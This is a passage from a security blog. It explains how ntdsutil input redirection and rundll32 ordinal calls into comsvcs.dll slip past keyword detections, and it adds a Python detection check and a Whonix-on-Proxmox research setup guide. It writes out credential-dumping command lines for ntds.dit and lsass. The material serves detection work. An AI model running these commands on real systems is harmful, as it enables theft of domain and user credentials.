(This should provide more info: <a href="https://ss64.com/nt/syntax-redirection.html">https://ss64.com/nt/syntax-redirection.html</a>) </p><p>For example, you can do `COMMAND > output.txt` to save output from a command.</p><p>There is also `<` where you can pass input from a file to an interactive binary or executable.</p><p>Additionally, you can also do | to pass input to a binary. </p><p>Here are examples:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHIr-GxtdpMRhEf29-VoqFsbxf6iQ4oi60grHza7hIx_LkZyIYmxHxI47cdO0_9zzNNzt3a6AYeTnUixobe7EC8xXIm0qPUlCtwohZDy7BDdXG05uCuhbFz8Q_nHmTqqrXg3-Yx_sM95_Rw7p3Cs2cYWF-w5LU03W6SwcTM0LCHDeSHlkYcqMjLiO3J9w/s1066/Pasted_Image_10_22_23__1_49_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="860" data-original-width="1066" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHIr-GxtdpMRhEf29-VoqFsbxf6iQ4oi60grHza7hIx_LkZyIYmxHxI47cdO0_9zzNNzt3a6AYeTnUixobe7EC8xXIm0qPUlCtwohZDy7BDdXG05uCuhbFz8Q_nHmTqqrXg3-Yx_sM95_Rw7p3Cs2cYWF-w5LU03W6SwcTM0LCHDeSHlkYcqMjLiO3J9w/w389-h314/Pasted_Image_10_22_23__1_49_PM.png" width="389" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB2QyW3j6NXIfATgEhVGaOMxoxTkQK1TnXaVyZwQlhQemlTZsReYRSNpJxPrI1FuEVWeiBTuRVZgxamZ7lTVjK-PJN_AY__-bqEsn0jhUPnK6jv5ilAhM2UG7KRQQdHUsh8mT4tIrlIkRjZ74AeB0Wo82_4ef2qXn31CfEksFoStsSzrCbsRnFF-B9c64/s1130/Pasted_Image_10_22_23__1_53_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="862" data-original-width="1130" height="311" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB2QyW3j6NXIfATgEhVGaOMxoxTkQK1TnXaVyZwQlhQemlTZsReYRSNpJxPrI1FuEVWeiBTuRVZgxamZ7lTVjK-PJN_AY__-bqEsn0jhUPnK6jv5ilAhM2UG7KRQQdHUsh8mT4tIrlIkRjZ74AeB0Wo82_4ef2qXn31CfEksFoStsSzrCbsRnFF-B9c64/w408-h311/Pasted_Image_10_22_23__1_53_PM.png" width="408" /></a></div><br /><p>The redirection technique using < is what I observed during an alert from a pentest.</p><p>Essentially, the attacker added their commands for the ntds dump to a text file, then passed the text file to ntdsutil.exe using <, so the command line looked like `<span style="font-family: courier;">ntdsutil < filewithcommands.txt</span>`.</p><p>Usually, this is what you may see: <span style="font-family: courier;">ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q</span></p><p><a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration">https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration</a> </p><p>If your detections are looking specifically for a command line with "<span style="font-family: courier;">ac i ntds</span>" and "<span style="font-family: courier;">create full</span>" and the attacker uses the redirection technique, you may miss a detection.</p><p>There are Sigma rules here, some of which would miss this and some of which wouldn't: <a href="https://detection.fyi/search/?query=ntdsutil">https://detection.fyi/search/?query=ntdsutil</a></p><p>I just thought it was interesting for the attacker to write the commands to a text file and dump ntds.dit this way, since I've never seen it being done like that.</p><p><br /></p><p><b>Rundll32 w/ ordinals</b></p><p>This once again is not new. If you've done malware analysis, you've probably seen DLL functions being called by ordinal number. 
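<br /><br />As an added example (my own code, not from this post or any of the Sigma rules it links), here is a small Python check that runs a keyword-only rule and a hardened rule over a few constructed 4688-style command lines: the typical ntdsutil and comsvcs.dll MiniDump forms quoted in this post, the <span style="font-family: courier;">ntdsutil < file</span> redirect described above, and the rundll32 comsvcs.dll <span style="font-family: courier;">#24</span> ordinal variant described further down in this section. The sample command lines, rule names and function names are my own.<br />

```python
"""Keyword-only vs. hardened rules for ntdsutil/comsvcs command lines.

Added example, not code from the post. Runs two rule sets over constructed
4688-style CommandLine values: a naive keyword rule of the kind the post says
would miss the redirect and ordinal variants, and a hardened rule that also
catches them.
"""
import re

# Constructed sample command lines (not real logs). Two are the typical forms
# quoted in the post, three are the redirect/ordinal variants it describes,
# and the rest are benign noise.
SAMPLE_COMMAND_LINES = [
    r"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q",
    r"ntdsutil < filewithcommands.txt",
    r"cmd.exe /c ntdsutil.exe < C:\Users\Public\cmds.txt",
    r".\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full",
    r"rundll32.exe C:\windows\System32\comsvcs.dll, #24 624 C:\temp\lsass.dmp full",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r"notepad.exe C:\temp\notes.txt",
]

# Naive rules: match only the well-known argument strings.
NTDSUTIL_KEYWORDS = re.compile(r"ntdsutil.*\bac\s+i\s+ntds\b.*\bcreate\s+full\b", re.I)
COMSVCS_MINIDUMP_KEYWORD = re.compile(r"comsvcs\.dll.*\bminidump\b", re.I)

# Hardened rules: ntdsutil with stdin redirected from any file, and rundll32
# loading comsvcs.dll with an export named by ordinal (#<n>) rather than by name.
NTDSUTIL_STDIN = re.compile(r"\bntdsutil(?:\.exe)?\b[^<|]*<\s*\S+", re.I)
COMSVCS_ORDINAL = re.compile(r"\brundll32(?:\.exe)?\b.*comsvcs\.dll\s*,?\s*#(\d+)", re.I)


def naive_hits(cmdline: str) -> list[str]:
    """Rule names fired by the keyword-only rules."""
    hits = []
    if NTDSUTIL_KEYWORDS.search(cmdline):
        hits.append("ntdsutil-ifm-keywords")
    if COMSVCS_MINIDUMP_KEYWORD.search(cmdline):
        hits.append("comsvcs-minidump-keyword")
    return hits


def hardened_hits(cmdline: str) -> list[str]:
    """Rule names fired by the keyword rules plus the redirect/ordinal rules."""
    hits = naive_hits(cmdline)
    if NTDSUTIL_STDIN.search(cmdline):
        hits.append("ntdsutil-stdin-redirect")
    match = COMSVCS_ORDINAL.search(cmdline)
    if match:
        # Ordinal 24 is MiniDumpW in comsvcs.dll (as the post notes); any
        # ordinal call into comsvcs.dll via rundll32 deserves an analyst's look.
        hits.append(f"comsvcs-ordinal-{match.group(1)}")
    return hits


def missed_by_naive(cmdlines: list[str]) -> list[str]:
    """Command lines the hardened rules flag but the keyword-only rules do not."""
    return [c for c in cmdlines if hardened_hits(c) and not naive_hits(c)]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(f"{line!r}\n  naive={naive_hits(line)} hardened={hardened_hits(line)}")
    print("missed by keyword-only rules:", missed_by_naive(SAMPLE_COMMAND_LINES))
```

<br />One caveat on where to run it: the <span style="font-family: courier;"><</span> is handled by cmd.exe, so the 4688 event for the ntdsutil.exe process itself only carries <span style="font-family: courier;">ntdsutil</span>; the redirect shows up in the command line of the cmd.exe that launched it, which is why the check has to be applied to the parent's command line as well as the child's.<br />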
</p><p>Essentially, you can call a function by ordinal instead of the function name.</p><p>These articles should explain the concept better:</p><p><a href="https://www.pcmatic.com/blog/running-dll-files-malware-analysis/">https://www.pcmatic.com/blog/running-dll-files-malware-analysis/</a> </p><p><a href="https://kamransaifullah.medium.com/practical-malware-analysis-chapter-3-basic-dynamic-analysis-42e1b7e913d4">https://kamransaifullah.medium.com/practical-malware-analysis-chapter-3-basic-dynamic-analysis-42e1b7e913d4</a></p><p>Here's an example:</p><p>instead of using LaunchApplication, I can use #1 as that's the ordinal.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhekJysQDtbFwoI-2TxHHju9LfJv7CDqZq85B0WXSJwXQPJkgeXNmqejACoiUcGFHSwVB7-Z5IATgjyat3P0dAQFJYWZtdyUxzVM9qNi2HYnac-rQBWE0E92iwrtVhkAvgK17zOszqcgJACYn8jhuPV5JB6bx08AR2ZetTWEf0kgdCI-7wbyO90a8OjNYM/s2300/Pasted_Image_10_22_23__2_06_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="2300" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhekJysQDtbFwoI-2TxHHju9LfJv7CDqZq85B0WXSJwXQPJkgeXNmqejACoiUcGFHSwVB7-Z5IATgjyat3P0dAQFJYWZtdyUxzVM9qNi2HYnac-rQBWE0E92iwrtVhkAvgK17zOszqcgJACYn8jhuPV5JB6bx08AR2ZetTWEf0kgdCI-7wbyO90a8OjNYM/w595-h245/Pasted_Image_10_22_23__2_06_PM.png" width="595" /></a></div><br /><p>The way this technique was abused during pentest was for lsass dump. 
The attacker used rundll32 with C:\windows\System32\comsvcs.dll to dump lsass.</p><p>The typical command you'll see for this is "<span style="font-family: courier;">.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full</span>"</p><p><a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs.dll">https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs.dll</a></p><p>If we look at the exports of comsvcs.dll for MiniDump, we'll see MiniDumpW at ordinal 0x18 (hex 18, which is 24 in decimal).</p><p>Instead of writing <span style="font-family: courier;">MiniDump</span> with comsvcs.dll in rundll32, the attacker replaced it with <span style="font-family: courier;">#24</span>. If you're looking specifically for comsvcs and minidump, the rule would miss this. Again, this was the first time I've seen someone do an lsass dump this specific way.</p><p>There are some rules here, some of which would detect this technique and some of which wouldn't: <a href="https://detection.fyi/search/?query=comsvcs">https://detection.fyi/search/?query=comsvcs</a></p><p><br /></p><p><br /></p><p>I just wrote this to share and to keep this in mind when looking at alerts, hunting, or writing detections. </p><p>This assumes you only have 4688/command-line logs. I'm aware that there are other ways to detect this activity but 🧂 sometimes you're lucky to even have 4688. 
🧂 (yeah I work for a managed security provider)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://pbs.twimg.com/media/E0jSj5iWEAgQ3UV?format=jpg&name=900x900" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="800" height="225" src="https://pbs.twimg.com/media/E0jSj5iWEAgQ3UV?format=jpg&name=900x900" width="400" /></a></div><br /><p><a href="https://twitter.com/cyb3rops/status/1389592014812024843">https://twitter.com/cyb3rops/status/1389592014812024843</a></p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjLF46BWD_r9UUY9fYMJypxHBZ0q6cYg95fe-hlcMkIQBfcLDvqgNjsjIXa-_ezREJrJJLGAB8YEFZduFPNrs7Y62gJ2tDkgayhJwA-jX1Yn5xb7yU1bQ4hIP1OJX9Tm5OTp0cNiy2suImER-rubluw03FquapqLcqiYRrwOZwPelRmOD_BUNqkzygyw/s1523/1647249698108.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1523" data-original-width="1075" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjLF46BWD_r9UUY9fYMJypxHBZ0q6cYg95fe-hlcMkIQBfcLDvqgNjsjIXa-_ezREJrJJLGAB8YEFZduFPNrs7Y62gJ2tDkgayhJwA-jX1Yn5xb7yU1bQ4hIP1OJX9Tm5OTp0cNiy2suImER-rubluw03FquapqLcqiYRrwOZwPelRmOD_BUNqkzygyw/w282-h400/1647249698108.jpeg" width="282" /></a></div><br /><p><a href="https://www.linkedin.com/posts/the-cyber-security-hub_activity-6909066000407633921-jVZQ">https://www.linkedin.com/posts/the-cyber-security-hub_activity-6909066000407633921-jVZQ</a></p><p><br /></p><p><br /></p><p><b>Installing Whonix Gateway on Proxmox for threat & malware research</b> (2023-10-07)</p><p><b>Intro</b></p><p>Whonix is a tool for routing traffic through Tor. Whonix VMs come in Desktop (with UI) or CLI form. 
They provide two types of VMs: a gateway and a workstation. The Whonix gateway can be used to route traffic through Tor when you attach other VMs to it. </p><p>In this post, I'm just setting up Whonix Gateway CLI so I can route my VMs through Tor while I'm researching malware or threats. </p><p>This setup may not always be ideal for research, as some C2s, phishing kits, and OSINT research sites may block Tor exit nodes.</p><p><br /></p><p><b>Warning</b>: This method isn't officially supported by Whonix and I can't guarantee this is 100% safe and won't leak anything or won't allow an attacker to escape the Whonix network or fingerprint you. Do your threat modeling and risk assessment for what you're planning to research or allow to execute in VMs. <b>Follow official Whonix guidelines if you don't know what you're doing or don't feel comfortable doing this.</b></p><p><br /></p><p><b>Proxmox Network Preparation</b></p><p>We need to create a new Linux Bridge/virtual network for Whonix so VMs can communicate with the Whonix Gateway.</p><p>In the Proxmox host network settings, add a new Linux Bridge.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhkdqLK4JAsSyKOTKRWu37k6yexDhVtGxspYMiJzH3DAvxavUcL-1NBGXRUeAher6-huiKEJcLoY24B7wbwwyHyHvZP3QqKWNAFjSVmnZ8aYQ7LE90iNucnGjWDn5mHayw9eL3ENFQfb8ga_lN7UlhxtZDAPXjkZYJCUFM9gD23Mbg1koVFaa--2SO5j-o" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="532" data-original-width="694" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhkdqLK4JAsSyKOTKRWu37k6yexDhVtGxspYMiJzH3DAvxavUcL-1NBGXRUeAher6-huiKEJcLoY24B7wbwwyHyHvZP3QqKWNAFjSVmnZ8aYQ7LE90iNucnGjWDn5mHayw9eL3ENFQfb8ga_lN7UlhxtZDAPXjkZYJCUFM9gD23Mbg1koVFaa--2SO5j-o" width="313" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEgQepbAAnhzI5lc94O3xmITinbN21fGtF-A7R7IOkLwp_8odrEKioCcbzMaPBtKzlWNYI9Ob2F2H4HfkoXCaytIzPK-m1Ncip-I4EK5aKG5K3iS7b0Se6JtL_90fvkMLWIdSzPe0BWDsvyvXNqRoBwJuEjENQvFHnhzunM8NUo8-cnftH1HtIm8WFEMJgo" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="516" data-original-width="1210" height="155" src="https://blogger.googleusercontent.com/img/a/AVvXsEgQepbAAnhzI5lc94O3xmITinbN21fGtF-A7R7IOkLwp_8odrEKioCcbzMaPBtKzlWNYI9Ob2F2H4HfkoXCaytIzPK-m1Ncip-I4EK5aKG5K3iS7b0Se6JtL_90fvkMLWIdSzPe0BWDsvyvXNqRoBwJuEjENQvFHnhzunM8NUo8-cnftH1HtIm8WFEMJgo=w364-h155" width="364" /></a></div><br />Click "Apply Configuration" at the top to finish creating the bridge.<p></p><p>FYI: you may see vmbr1 if you don't have another bridge set up already.</p><p><br /></p><p><b>Creating a VM</b></p><p>We need to create a VM to run Whonix Gateway in. We'll create the VM first, then import the Whonix Gateway VMDK into it.</p><div class="separator" style="clear: both; text-align: left;">Pick a name</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEijwtR07xdWPghAE_3CZ-B0hrCKiR0FBmpuHLXLyV-oerwyK3ACleoe0K-HqiYPrGnIUxkvKodY3sx-ucAbMgRlwdLrdRVtvu0Py6JNn2t5tYzVCUSpBnzjv0ih1Tzf68p2mXTL8ezhQ1_lLAeywL1hQyGOrDDwB2eonjUsTn232W20g_DPxC9hHipL338" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="354" data-original-width="1444" height="78" src="https://blogger.googleusercontent.com/img/a/AVvXsEijwtR07xdWPghAE_3CZ-B0hrCKiR0FBmpuHLXLyV-oerwyK3ACleoe0K-HqiYPrGnIUxkvKodY3sx-ucAbMgRlwdLrdRVtvu0Py6JNn2t5tYzVCUSpBnzjv0ih1Tzf68p2mXTL8ezhQ1_lLAeywL1hQyGOrDDwB2eonjUsTn232W20g_DPxC9hHipL338" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Click "Do not use any media"</div><div class="separator" style="clear: both; text-align: 
center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiMw2JTmBI2qgGp9Pp8O0kHnKB_x-gfFnzrJw0jJw-DuVrp0bLMWQINOOTD6GoKp8n2vui9-lFSVViVDWLE80zKEaIz2xqvdOQWhELX1HZK95FC_bz7IIAIsiOsji_jqGxqdm4AL25HGDj8clqOGW7OKsVh5PkaC9YvNbNue9_Rk9AcLBq1EqTx9heGj3Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="724" height="218" src="https://blogger.googleusercontent.com/img/a/AVvXsEiMw2JTmBI2qgGp9Pp8O0kHnKB_x-gfFnzrJw0jJw-DuVrp0bLMWQINOOTD6GoKp8n2vui9-lFSVViVDWLE80zKEaIz2xqvdOQWhELX1HZK95FC_bz7IIAIsiOsji_jqGxqdm4AL25HGDj8clqOGW7OKsVh5PkaC9YvNbNue9_Rk9AcLBq1EqTx9heGj3Q" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;">Delete the disk, we'll import a disk later</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEisWZ_qz9_OE4I40CruBy3TcfnTeUQWVSfgA5icCvnIX-N_cediG9flX4ZpVcQjSvlXIAQ4IDGs0wzUzJBAwX45FqU87yelVvwDDgimmWX3C40fvq0RxPuxasYPKJNdaVR0KO81IpKaa1IY5VfxPvWjA2_wJm8mp-Kl9eQnqFcktAjozKqXFeRAGvvU1oQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="436" data-original-width="630" height="221" src="https://blogger.googleusercontent.com/img/a/AVvXsEisWZ_qz9_OE4I40CruBy3TcfnTeUQWVSfgA5icCvnIX-N_cediG9flX4ZpVcQjSvlXIAQ4IDGs0wzUzJBAwX45FqU87yelVvwDDgimmWX3C40fvq0RxPuxasYPKJNdaVR0KO81IpKaa1IY5VfxPvWjA2_wJm8mp-Kl9eQnqFcktAjozKqXFeRAGvvU1oQ" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">CPU & Memory can be left at default values, however, I'm lowering my memory to 1024.</div><div class="separator" style="clear: both; text-align: left;">Network can be left as default vmbr0. 
We'll add 2nd interface later.</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Once the VM is created, go to VM Hardware and add Network Device.</div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvToNnE5U1xaDEqBivq2lEgJc5jpVBN2JzF-fhmrS8C34yQKjpmQFBfoAjZizsIDG_5wfVV3pdxy_05AGm3LgFTghXv-c3do9X2_C5JkGn3-TRsoRfFac6qubTaK04uzghwU-r9TdNWTJyDiZbSy0-XvPvfIXDzjpAaAxVGPbdO21frMEbs4RKOduDIHs" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="310" data-original-width="302" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvToNnE5U1xaDEqBivq2lEgJc5jpVBN2JzF-fhmrS8C34yQKjpmQFBfoAjZizsIDG_5wfVV3pdxy_05AGm3LgFTghXv-c3do9X2_C5JkGn3-TRsoRfFac6qubTaK04uzghwU-r9TdNWTJyDiZbSy0-XvPvfIXDzjpAaAxVGPbdO21frMEbs4RKOduDIHs" width="234" /></a></div><br />Pick and add Whonix bridge</div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiigoYeoz_WD2BtHsDxARo3WKL5WgA1bIBFjx7JmepRVQtCd3Lcrm1staaPvE74Vz5quSd9oTGuiYXBnCCj_-n8TqECHlKg_9SXV1o2CzH1SVl0-d9OZP9qTRSdGDfNaq_CO3YdcGiK73Bj_RokjvhJt5JlsVQffO9E7YUw19RcJ_oC2P_hcksipIXDadg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="382" data-original-width="1198" height="126" src="https://blogger.googleusercontent.com/img/a/AVvXsEiigoYeoz_WD2BtHsDxARo3WKL5WgA1bIBFjx7JmepRVQtCd3Lcrm1staaPvE74Vz5quSd9oTGuiYXBnCCj_-n8TqECHlKg_9SXV1o2CzH1SVl0-d9OZP9qTRSdGDfNaq_CO3YdcGiK73Bj_RokjvhJt5JlsVQffO9E7YUw19RcJ_oC2P_hcksipIXDadg=w394-h126" width="394" /></a></div></div><div><br /></div>That's all.<div><br /><p><b>Loading the Whonix Gateway disk</b></p><p>Download Whonix CLI OVA file from here: 
https://www.whonix.org/wiki/VirtualBox#CLI</p><p>SCP the file to Proxmox.</p><p>Use tar to extract the OVA file, which will give you the VMDK files.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvUkrp5lhsAZqVLedx4ajFYuzRjOKm6DY9dacSBBIICOlKEYl0kbbxi7pNMnv4k0jMl_QhtdseJA2vF822xyWlIsy92pQ8O5g8rZnwc6YnZRwieEpI2bJBm_IUYKXAR9LIksYy79L6ctWzgzBrrFyfqIEfy7oyclf7wM_cV7w4r5dhkM_3Ncc8bnS67to" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="326" data-original-width="1138" height="137" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvUkrp5lhsAZqVLedx4ajFYuzRjOKm6DY9dacSBBIICOlKEYl0kbbxi7pNMnv4k0jMl_QhtdseJA2vF822xyWlIsy92pQ8O5g8rZnwc6YnZRwieEpI2bJBm_IUYKXAR9LIksYy79L6ctWzgzBrrFyfqIEfy7oyclf7wM_cV7w4r5dhkM_3Ncc8bnS67to=w479-h137" width="479" /></a></div><br />Use the qm importdisk command to import the disk into your VM.<p></p><p>The whonix-gateway-cli VM I created earlier has the ID 100. My storage is local-lvm (the default Proxmox storage). 
</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhIR7VqNbnBGaw7FuCK5SFVkJQ9wZyJGorfRNrYmylCvFI8lzfOXHcbIPfPIBh6g5CocZlkF0zWOtWS60bgJ33lq11r2AEsd52uZxLWQ_DK08ZEQ3QSxY18ivsVQvSdBBCoVeWhYqI74EuNLTVpZUfbAn2r1DBB_lrFInTQ67Mv1aHJcLizGoh36nx2bEQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="184" data-original-width="1906" height="58" src="https://blogger.googleusercontent.com/img/a/AVvXsEhIR7VqNbnBGaw7FuCK5SFVkJQ9wZyJGorfRNrYmylCvFI8lzfOXHcbIPfPIBh6g5CocZlkF0zWOtWS60bgJ33lq11r2AEsd52uZxLWQ_DK08ZEQ3QSxY18ivsVQvSdBBCoVeWhYqI74EuNLTVpZUfbAn2r1DBB_lrFInTQ67Mv1aHJcLizGoh36nx2bEQ=w599-h58" width="599" /></a></div><br />Once the Importing is done and you get the message of successful import, run qm rescan.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhv52Gfusk8m2oBmhCJIIzZ9LlQepMxU5PY8kJR51ub-s0q41HlUtONOOMYoA58DwvPv9wmZFmFwlu25KDhc40Du0Sn1K-ptcZKpQUzI_lkbwAEK3iqMKHy97sElizu_u9im3ErSsjM8YAyjPo6JcTvUUrWWEhiX4sL0UcN-ZHDLBAUkV3Cdri2PD40G4k" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="206" data-original-width="1162" height="89" src="https://blogger.googleusercontent.com/img/a/AVvXsEhv52Gfusk8m2oBmhCJIIzZ9LlQepMxU5PY8kJR51ub-s0q41HlUtONOOMYoA58DwvPv9wmZFmFwlu25KDhc40Du0Sn1K-ptcZKpQUzI_lkbwAEK3iqMKHy97sElizu_u9im3ErSsjM8YAyjPo6JcTvUUrWWEhiX4sL0UcN-ZHDLBAUkV3Cdri2PD40G4k=w430-h89" width="430" /></a></div><p></p><p>Feel free to remove the extracted files and ova file.</p><p><br /></p><p><b>Modifying the Whonix Gateway VM again</b></p><p>Now we need to enable the disk and change our boot settings.</p><p>Go to Whonix-gateway-cli VM and Hardware tab and double click on "Unused disk 0" then click Add</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhxIyhpFkb-cV8gWkvjI3y4vBkW_L0hfPFBIvadIDWiANUpSLocxNSe7kwglalnFZypuK9YTcbqZJh0x4-1Mw4j6mCSkRtr64BlYzaelA4JQlvPgYYZAiFlK1UXyDzircIfDutb9XsO-j46ecvxqYq6fvvpp9Fez1Rrh39PJyRo-1A7gKdIkdd8StpcGDI" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="566" data-original-width="1456" height="152" src="https://blogger.googleusercontent.com/img/a/AVvXsEhxIyhpFkb-cV8gWkvjI3y4vBkW_L0hfPFBIvadIDWiANUpSLocxNSe7kwglalnFZypuK9YTcbqZJh0x4-1Mw4j6mCSkRtr64BlYzaelA4JQlvPgYYZAiFlK1UXyDzircIfDutb9XsO-j46ecvxqYq6fvvpp9Fez1Rrh39PJyRo-1A7gKdIkdd8StpcGDI=w392-h152" width="392" /></a></div><br />Go to Options, double-click Boot Order and modify it to boot from scsi0 (the disk we just loaded).<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg0kpqiQNVCzXd6e_u7hgJKoDMEa6IgsY6sHy9VvP_Zkqv4xfPXEMUtHFS37aUpQHGubt6ifdlJhXO0gY_143ArkF0zUdKvsX-P93hx7Xq1EfY8H4oIwNh09POIqwdyk1ajqspsccWtijl_zg_vxUodf8q89ZLwzo2kN1L_fWMMMuKvbvkCEdXV9qOOr0o" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="530" data-original-width="1264" height="154" src="https://blogger.googleusercontent.com/img/a/AVvXsEg0kpqiQNVCzXd6e_u7hgJKoDMEa6IgsY6sHy9VvP_Zkqv4xfPXEMUtHFS37aUpQHGubt6ifdlJhXO0gY_143ArkF0zUdKvsX-P93hx7Xq1EfY8H4oIwNh09POIqwdyk1ajqspsccWtijl_zg_vxUodf8q89ZLwzo2kN1L_fWMMMuKvbvkCEdXV9qOOr0o=w368-h154" width="368" /></a></div><p><br /></p><b>Configuring networking inside whonix-gateway-cli VM</b><p></p><p>Make sure to remember the MAC addresses for net0 and net1 listed in the Hardware tab.</p><p>Essentially, we want to make sure that net1/vmbr2/the Whonix network has the 10.152.152.10 IP.</p><p>net0/vmbr0/the normal network needs to be configured with a static IP.</p><p>Start the VM and go to the console.</p><p>Log in with user/changeme, then go through all the setup steps.</p><p>When the machine is trying to connect to tor, press control+c to cancel 
the script and get a shell.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiK0_yHFLl-Mhdsuah3j1JXzK9bij_GInWpOYnyRl5SAnmDgY5INzrG47Ffu3YPH_QZp-ysbXdf00k782Z9kIgE5uaHF-08I7od34epXactZ1UliIVQO_tuF3vk65m8VI34eNS8XmruPzQgMPX-8G_l3LN3VjEXVcSOcs4arVWAZYsVVliLfKEUgFKI4AA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="886" data-original-width="1008" height="341" src="https://blogger.googleusercontent.com/img/a/AVvXsEiK0_yHFLl-Mhdsuah3j1JXzK9bij_GInWpOYnyRl5SAnmDgY5INzrG47Ffu3YPH_QZp-ysbXdf00k782Z9kIgE5uaHF-08I7od34epXactZ1UliIVQO_tuF3vk65m8VI34eNS8XmruPzQgMPX-8G_l3LN3VjEXVcSOcs4arVWAZYsVVliLfKEUgFKI4AA=w388-h341" width="388" /></a></div><br />Edit the network configuration<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiXKo-dzHzkH1SY09A5CnNhtYTIfpRVq3CZ0ahk7FXZJZvJIsnKNDuCpZgVrJhgBhhoCC04TOFESehARahDwWSu7ZJ1CoQJ41d71fR_PC0WMSPxA-QtfQsxlV16b2Izrj8KULlPpwWwJMG5lAjrDV4qSvavB9UJYFzszAuHUdGMxA3jc4xz8viQsGdpEWY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="176" data-original-width="1058" height="92" src="https://blogger.googleusercontent.com/img/a/AVvXsEiXKo-dzHzkH1SY09A5CnNhtYTIfpRVq3CZ0ahk7FXZJZvJIsnKNDuCpZgVrJhgBhhoCC04TOFESehARahDwWSu7ZJ1CoQJ41d71fR_PC0WMSPxA-QtfQsxlV16b2Izrj8KULlPpwWwJMG5lAjrDV4qSvavB9UJYFzszAuHUdGMxA3jc4xz8viQsGdpEWY=w557-h92" width="557" /></a></div><br />Change the default eth0 configuration to configuration that matches your network. 
